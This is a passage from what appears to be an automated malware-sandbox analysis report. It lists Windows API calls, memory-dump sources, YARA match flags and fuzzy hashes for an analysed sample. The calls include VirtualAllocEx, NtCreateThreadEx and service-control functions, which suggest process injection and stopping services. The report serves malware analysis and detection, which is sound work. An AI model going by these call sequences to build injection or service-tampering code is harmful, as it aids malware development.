• RtlMoveMemory.NTDLL(00000000,?,00000028), ref: 004ACCEE
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Similarity
• API ID: MemoryMove
• String ID:
• API String ID: 1951056069-0
• Opcode ID: 913ff5a2519681b304e92d9d154333b9584e064f65dfde0384efe33d5939c1da
• Instruction ID: 8d7095cc10ac26fa4aae4f50465f74b64ce85441637d28cd090b275446585c5a
• Opcode Fuzzy Hash: 913ff5a2519681b304e92d9d154333b9584e064f65dfde0384efe33d5939c1da
• Instruction Fuzzy Hash: C1C26BB1A402569BFB00CF68DCC1B99B7B5FF69314F2800A5E949AF345D378B861CB25
APIs
• LoadLibraryExA.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00480619
• GetProcAddress.KERNEL32(00000000,?), ref: 0048064D
• FreeLibrary.KERNEL32(00000000), ref: 00480686
• FreeLibrary.KERNEL32(00000000), ref: 004806BC
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Similarity
• API ID: Library$Free$AddressLoadProc
• String ID:
• API String ID: 1386263645-0
• Opcode ID: dd08a0b129e835c7341ee53d25648eacdba20f52a76bfba98aed461e65d8d52b
• Instruction ID: 0b36be4421df4ffe14451ddc10b0ef7eea8e3398015ed76abc2f8a05a57d9849
• Opcode Fuzzy Hash: dd08a0b129e835c7341ee53d25648eacdba20f52a76bfba98aed461e65d8d52b
• Instruction Fuzzy Hash: E5215E70D44308FBDB40AF91D886BADFB30AB06711F0090A6F5043A281E67A4A64DF8A
                                                                APIs
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000001,00000000,00000000), ref: 00464865
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00464899
                                                                • FreeLibrary.KERNEL32(00000000), ref: 004648D2
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00464908
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: Library$Free$AddressLoadProc
                                                                • String ID:
                                                                • API String ID: 1386263645-0
                                                                • Opcode ID: 61867cee61673b8c5bc704db50f2db6c69816edac588f5e4c4e309f2d61891a7
                                                                • Instruction ID: 1c2fb0e7d49ca85341126b8136eb07d6b70494b27a7b4068fbaae1713d20d76b
                                                                • Opcode Fuzzy Hash: 61867cee61673b8c5bc704db50f2db6c69816edac588f5e4c4e309f2d61891a7
                                                                • Instruction Fuzzy Hash: 18211F74E44308FBDF10AF91D887BADBB30AB46711F0490A6F5443B191E3BA4A54DF9A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0123456789ABCDEF
                                                                • API String ID: 0-2554083253
                                                                • Opcode ID: f2b3387e526ee5b74b23a205e3babc367f2dc42ec1d66071d9c1a4f9c1bea81b
                                                                • Instruction ID: 2dcbae8a514f4991762682b637e4a4e976e6ba90ed2f06e3aca33d0b6d3aab42
                                                                • Opcode Fuzzy Hash: f2b3387e526ee5b74b23a205e3babc367f2dc42ec1d66071d9c1a4f9c1bea81b
                                                                • Instruction Fuzzy Hash: 291272B1E40318BBDB00AF91ECC6FAEB774FB09715F14402EF6087A291D7B55A248B59
                                                                APIs
                                                                • SetProcessAffinityMask.KERNEL32(FFFFFFFF,00000001), ref: 00478899
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: AffinityMaskProcess
                                                                • String ID: SysWOW64\$System32\
                                                                • API String ID: 1682748466-3355970615
                                                                • Opcode ID: c143c79d9f9a62d8f54c80bcca235d60cba4f5db886ebff09a9b945944dfcf5e
                                                                • Instruction ID: 600b19d7a304f7d6ae016af36924e3e5682a7f5f57c512ba0ad247e0f3559a8d
                                                                • Opcode Fuzzy Hash: c143c79d9f9a62d8f54c80bcca235d60cba4f5db886ebff09a9b945944dfcf5e
                                                                • Instruction Fuzzy Hash: F9A159B5F403097BFB10ABA19C87FBF7665DB14704F14442EFB0876382E6795A10879A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: _memset_sprintf
                                                                • String ID: @
                                                                • API String ID: 1557529856-2766056989
                                                                • Opcode ID: f069b91603a41ff908123fd5925583a40189015a3e8527e2ad4734a71876aac3
                                                                • Instruction ID: 5bcad89579a279ce71b0beade107a21a2cdafddcfe8c7a3c935b3859a84309d4
                                                                • Opcode Fuzzy Hash: f069b91603a41ff908123fd5925583a40189015a3e8527e2ad4734a71876aac3
                                                                • Instruction Fuzzy Hash: 8B912C72A0035696CF05CF38D8916F9BB64FF99310F1093A9DC8997283EF359A89C790
                                                                APIs
                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004468AC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID: $@
                                                                • API String ID: 4275171209-1077428164
                                                                • Opcode ID: 20e2ec048a465a2e59170b1eba84c793c3a44684f2b099a2b201507d676b7764
                                                                • Instruction ID: 39c837652ff9d56bb4902057a52924e340a8ea02d9208a91a936f42709c8c547
                                                                • Opcode Fuzzy Hash: 20e2ec048a465a2e59170b1eba84c793c3a44684f2b099a2b201507d676b7764
                                                                • Instruction Fuzzy Hash: E2112A75D41308FBEF109F90DC46B9D7B70EB05710F10806AFA143A2C1D3BA5A64DB9A
                                                                APIs
                                                                  • Part of subcall function 00442F45: GetForegroundWindow.USER32(?,?,00000000,00000000,00000000), ref: 00442F9B
                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00001000,?,00000040,?,?,?,?,?,?,00000000), ref: 00442BDF
                                                                • WaitForSingleObject.KERNEL32(00000000,FFFFFFFF,00000000,00000000,00000000,00000000,?,00000000,00000B20,?,00000000,00000000,?,00000000,00000000,00000008), ref: 00442D5C
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000B20,?,00000000,00000000,?,00000000,00000000,00000008,00000000,00000000,00000000,00000278,00000000), ref: 00442D88
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: AllocCloseForegroundHandleObjectSingleVirtualWaitWindow
                                                                • String ID:
                                                                • API String ID: 2553280185-0
                                                                • Opcode ID: ef6cf1559c89dbac98a191ce5bfbc5be0582424dcbd67282d324ff1646f01fc1
                                                                • Instruction ID: 6d19b2bcda7f9e7db432ddcf5afe7b37357597235b535cbcc868892b0ae7d1c5
                                                                • Opcode Fuzzy Hash: ef6cf1559c89dbac98a191ce5bfbc5be0582424dcbd67282d324ff1646f01fc1
                                                                • Instruction Fuzzy Hash: 22F1DAB1E00318ABEB10DFD1DD8ABEEBBB9BB09705F10401AF5087B291D7B95914CB59
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 40cb84a174550b18d08bbe64178c67b10c17c7a3cf46723df5a5e0982bf711a0
                                                                • Instruction ID: 91cf720465cdb31803388e93ab6542436ccaf64936c6835739f5a00f8a6d0cc2
                                                                • Opcode Fuzzy Hash: 40cb84a174550b18d08bbe64178c67b10c17c7a3cf46723df5a5e0982bf711a0
                                                                • Instruction Fuzzy Hash: 05F1B130C0490DEBCF00AF92EA45AEEBF75FF48305F618099E491750A8CB7A4A75DB59
                                                                APIs
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0046A4B7
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0046A678
                                                                Strings
                                                                • ZwQueryInformationThread, xrefs: 0046A370
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                Similarity
                                                                • API ID: lstrcpyn
                                                                • String ID: ZwQueryInformationThread
                                                                • API String ID: 97706510-1369173291
                                                                • Opcode ID: 0a3ee4fed2c8ce44732b8724ede729ce30fc5c293cf3a2399e430442a0bdce9f
                                                                • Instruction ID: 28c34d819d99a620a6dbfae205b49112b65cf5ed733fe33ab88b9bfd350a384f
                                                                • Opcode Fuzzy Hash: 0a3ee4fed2c8ce44732b8724ede729ce30fc5c293cf3a2399e430442a0bdce9f
                                                                • Instruction Fuzzy Hash: 8FC13FB5E40309AFDB00DF95C8C2B9DBBB0AF48315F10802AE518FB391E7759A518F96
                                                                APIs
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040C2B2
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000001), ref: 0040C405
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$AllocFree
                                                                • String ID: %02X
                                                                • API String ID: 2012307162-436463671
                                                                • Opcode ID: 348af9b981f95cd05340e47a5fab6030ef99a59052c5399de07684c23dbcc99d
                                                                • Instruction ID: f820671e8e1b72b8661a0b0d3ff940cad85c19a75f7646971955c3b9f8efaa7c
                                                                • Opcode Fuzzy Hash: 348af9b981f95cd05340e47a5fab6030ef99a59052c5399de07684c23dbcc99d
                                                                • Instruction Fuzzy Hash: D05192B1E00318EBDB00EF91ECD6BAEBBB4FF08704F50406AE545B6282D7755A608759
                                                                APIs
                                                                • ___from_strstr_to_strchr.LIBCMT ref: 005004AE
                                                                • _strrchr.LIBCMT ref: 005004B9
                                                                  • Part of subcall function 00500918: _swscanf.LIBCMT ref: 005009E1
                                                                • _sprintf.LIBCMT ref: 005005E8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ___from_strstr_to_strchr_sprintf_strrchr_swscanf
                                                                • String ID:
                                                                • API String ID: 4156322039-0
                                                                • Opcode ID: a232865a14efafa4031ecc2264e99cddb451be3a93087fce55aebd1986ee227b
                                                                • Instruction ID: 98b2b6ef30d8a2abc5f55b3005c0b96c9beec08c3fd79234439ca0752c8596ce
                                                                • Opcode Fuzzy Hash: a232865a14efafa4031ecc2264e99cddb451be3a93087fce55aebd1986ee227b
                                                                • Instruction Fuzzy Hash: E661F631A0024A9ACF15CF78D8907E9FB70BF99314F04C29AD85D57382EB35559ACB60
                                                                APIs
                                                                  • Part of subcall function 0042E480: Sleep.KERNEL32(80000301,00426E6B,00000001,00000FA0,00000000,80000301), ref: 0042E489
                                                                • ControlService.ADVAPI32(00000000,00000004,?,00000000), ref: 004281E9
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00428222
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0042824E
                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000), ref: 004282E1
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0042830D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$ControlSleep
                                                                • String ID:
                                                                • API String ID: 2838030454-0
                                                                • Opcode ID: 5c76f451e7895eef559d2f7fd1648643742de301721789c67c4d333581bd3a50
                                                                • Instruction ID: 9c82d7141dc97e90364c366040459eb9b9caf9826acf166fbad779250739215e
                                                                • Opcode Fuzzy Hash: 5c76f451e7895eef559d2f7fd1648643742de301721789c67c4d333581bd3a50
                                                                • Instruction Fuzzy Hash: FD11B470F46315BBD7009F41FD47B7DB634DB06715F50106AF2087A181DABA4A509AAF
                                                                APIs
                                                                  • Part of subcall function 0042E480: Sleep.KERNEL32(80000301,00426E6B,00000001,00000FA0,00000000,80000301), ref: 0042E489
                                                                • ControlService.ADVAPI32(00000000,00000004,?,00000000), ref: 00426960
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00426999
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 004269C5
                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000), ref: 00426A43
                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00426A6F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$ControlSleep
                                                                • String ID:
                                                                • API String ID: 2838030454-0
                                                                • Opcode ID: 29f996ce849e4bc8de920b269222e43aa67c569d2ee89dde9ff2c0a1153f15a1
                                                                • Instruction ID: aa4971f872d8d67db1281ed5f5ec28e7136786273a52719357ff5be130c09f79
                                                                • Opcode Fuzzy Hash: 29f996ce849e4bc8de920b269222e43aa67c569d2ee89dde9ff2c0a1153f15a1
                                                                • Instruction Fuzzy Hash: 9711D3B0F40315BBD7009F41FD43B7EB630EB06725F50106AF6093A191D6BA4A508EAF
                                                                APIs
                                                                • PeekMessageA.USER32(0048E791,00000000,00000000,00000000,00000001), ref: 0048E852
                                                                • TranslateMessage.USER32(0048E791), ref: 0048E886
                                                                • DispatchMessageA.USER32(0048E791), ref: 0048E8B2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$DispatchPeekTranslate
                                                                • String ID:
                                                                • API String ID: 4217535847-0
                                                                • Opcode ID: 6f86afd49eb9493887e166ce1be699495c478fa4d613094b07f0bdd60864dbc5
                                                                • Instruction ID: 1e5bd79496006004a2d836a083b3cef8fe694022c7738674edacb5a485c286c2
                                                                • Opcode Fuzzy Hash: 6f86afd49eb9493887e166ce1be699495c478fa4d613094b07f0bdd60864dbc5
                                                                • Instruction Fuzzy Hash: 4211A7B4E40304BBEB10BF919D47B6DBA359B06711F101075F504BB1C1E6758A509B5E
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(?,0041C74B,?,00429A2F), ref: 0040A159
                                                                • RtlAllocateHeap.NTDLL(?,00000000,00000018), ref: 0040A192
                                                                • RtlInitializeCriticalSection.NTDLL ref: 0040A1C6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AllocateCriticalInitializeProcessSection
                                                                • String ID:
                                                                • API String ID: 2106503814-0
                                                                • Opcode ID: 4ca06075b39c7fee177ea6daca90cbd81469fb16033431a87bf5c582d0e1f86c
                                                                • Instruction ID: d0e7b6aa85a11e826f688ccae043789bd2029ef56c0dd2b1dd38e333951a52b0
                                                                • Opcode Fuzzy Hash: 4ca06075b39c7fee177ea6daca90cbd81469fb16033431a87bf5c582d0e1f86c
                                                                • Instruction Fuzzy Hash: 9E019E30E84704BBD710AF60AD0777DBA34A713712F2050BAF5087E2E0DAB51664DB8E
                                                                APIs
                                                                • strlen.MSVCRT ref: 00404290
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,FFFFFFFF,00000000,00000000,00000000), ref: 004042F7
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,FFFFFFFF,?,00000000,00000000), ref: 00404394
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$strlen
                                                                • String ID:
                                                                • API String ID: 3468603845-0
                                                                • Opcode ID: 8a875e31f46d09a251127f74f66463ba3538fd657eeeff8d435644ad433cbc1b
                                                                • Instruction ID: 54fd5ee7f4b538d1b53c2f26ad978a62514ba69baf5fc9b22066551dc07c41f7
                                                                • Opcode Fuzzy Hash: 8a875e31f46d09a251127f74f66463ba3538fd657eeeff8d435644ad433cbc1b
                                                                • Instruction Fuzzy Hash: 7E5173B1F00318ABDF00EF95EC82BAFBBB4AB05310F14117AF604B62D1D7795A548B99
                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(00000000,FFFFFFFF,?,?,?,?,?,?,00000000), ref: 004AEAFC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ObjectSingleWait
                                                                • String ID: NtCreateThreadEx
                                                                • API String ID: 24740636-544425562
                                                                • Opcode ID: 9e4945cc960e750403b6fe6ffcac5c8bcd7cca14399f24ee4e5e51a6ef31b45f
